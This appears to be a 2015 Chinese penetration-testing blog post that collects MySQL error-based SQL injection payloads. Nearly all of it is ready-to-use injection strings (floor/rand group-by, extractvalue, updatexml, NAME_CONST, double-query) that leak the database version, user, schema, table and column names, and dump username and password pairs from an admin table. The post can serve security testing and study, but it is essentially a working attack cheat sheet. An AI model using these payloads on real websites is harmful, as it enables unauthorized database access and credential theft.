mysql报错注入(显错注入)整理


Oct 26 2015

mysql报错注入(显错注入)整理

首页 » 渗透测试 » mysql报错注入(显错注入)整理   

1、通过floor暴错
/*数据库版本*/
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*简单办法暴库*/
id=info()
/*连接用户*/
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*连接数据库*/
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴库*/
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴表*/
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴字段*/
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴内容*/
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
2、ExtractValue(有长度限制,最长32位)
and extractvalue(1, concat(0x7e, (select @@version),0x7e))
and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))
3、UpdateXml(有长度限制,最长32位)
and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)
4、NAME_CONST(适用于低版本)
and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
5、Error based Double Query Injection (http://www.vaibs.in/error-based-double-query-injection/)
/*数据库版本*/
or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1

 

正文部分到此结束

文章标签: 报错注入 mysql报错注入 显错注入

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «基于psexec的域渗透测试工具—Smbexec v2.0 | Layer 子域名挖掘机3.1 崩溃修复+百万大字典»

这篇文章还没有收到评论,赶紧来抢沙发吧~